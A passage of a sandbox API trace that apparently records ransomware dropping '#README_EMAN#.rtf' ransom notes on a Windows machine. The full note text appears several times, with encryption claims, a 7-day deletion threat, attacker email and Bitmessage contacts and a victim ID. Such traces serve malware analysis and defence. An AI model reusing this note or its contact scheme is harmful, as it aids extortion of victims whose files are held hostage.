m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.831] WriteFile (in: hFile=0x284, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.832] CloseHandle (hObject=0x284) returned 1 [0284.832] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0284.832] GetLastError () returned 0x2 [0284.832] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0284.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.833] WideCharToMultiByte (in: 